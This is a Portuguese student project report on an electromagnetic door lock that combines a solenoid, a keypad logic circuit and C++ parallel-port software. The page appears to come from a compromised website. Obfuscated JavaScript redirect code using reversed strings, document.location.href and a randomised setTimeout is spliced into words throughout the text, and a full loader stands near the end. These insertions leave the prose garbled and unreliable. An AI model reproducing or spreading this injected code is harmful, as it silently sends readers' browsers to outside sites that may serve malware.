“Fisical Digital Porta”

A Fisical Digital Porta é um projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to no qual um solenóide gera um campo magnético e faz com que um imã acoplado a tranca de uma porta seja atraído ao solenóide, liberando o acionamentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to da porta.

CONTEÚDO:
1. RESUMO
A Fisical Digital Porta é um projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to no qual um solenóide gera um campo magnético e faz com que um imã acoplado a tranca de uma porta seja atraído ao solenóide, liberando o acionamentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to da porta.
2. OBJETIVOS
Utilização do eletromagnetismo nem algo útil no nosso dia a dia.
3. O PROJETO
O projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to consiste na construção de uma tranca para uma porta que funciona através do eletromagnetismo.
3.1 A Porta
Construída de madeira carvalinho, foi adaptada para receber um solenóide em sem interior através de um corte retangular no cantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to esquerdo da madeira central. No interior desse corte foi então colocado uma tranca, um imã, uma mola e o solenóide.
3.2 Dimensões da porta
Dimensões da madeira (largura, altura, profundidade)

– Base (1000mm, 50mm, 400mm);

– Laterais (150mm, 400mm, 50mm);

– Central (600mm, 400mm, 50mm);
3.3 O Solenóide
Para a construção do solenóide foi utilizado fio de cobre esmaltado e uma barra cilíndrica de ferrite. Foram dadas 850 voltas de fio de cobre esmaltado em toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torno da barra de ferrite. O solenóide deve ser alimentado com uma tensão de 30 V (DC) para que gere um campo suficiente para atrair o imã e conseqüentemente “puxando” a tranca.
5. O CIRCUITO
5. Circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to
Foram implementados dois circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, um para controle do solenóide e outro para que pudesse ser utilizado o teclado numérico.
5.1 Circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de Controle do Solenóide
Foram utilizados relés para “liberar” a tensão de 30V para o solenóide, fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to acopladores para impedir que volte tensão na porta paralela evitando um possível curtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to gerando a queima da mesma.
5.2 Circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de Controle de Teclado
Foram utilizados as portas lógicas XOR, AND, OR e NOT, flip-flops do tipo D, diodos, capacitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores, resistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores dispostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos da maneira como segue.

6. Software Desenvolvido
O Software foi desenvolvido em C++ onde o mesmo recebia valores da porta paralela do PC e através disso fazia com que o solenóide funcionasse liberando a abertura da porta.

MATERIAIS:
– Madeira Carvalinho 5mm;

– Ferrite (Solenóide);

– Cobre Esmaltado (Solenóide);

– Imã;

– Tranca de porta;

– 2 Flip-Flops D (CI 7474);

– 6 CI fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to acoplador (4N25);

– Diodos;

– Portas Lógicas;

– Eprom;

– CI 555;

– Relé;

– Teclado Numérico.

CONCLUSÃO:
A tarefa de desenvolver um projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to não é simples. Sem o emprenho de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todos envolvidos, alunos, professores e técnicos, não seria possível a realização do mesmo. Houveram modificações no projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to em relação a idéia inicial devido a dificuldades encontradas ao longo do caminho. Apesar de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todos os empecilhos conseguimos atingir as metas e espctativas esperadas.

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores>AUTORES:
– Cassiano Machado Inácio
– Emerson Richter
– Paolo Passeri
– Philippe Santa Maria
– Rafael Ferreira de Lima

IMAGENS: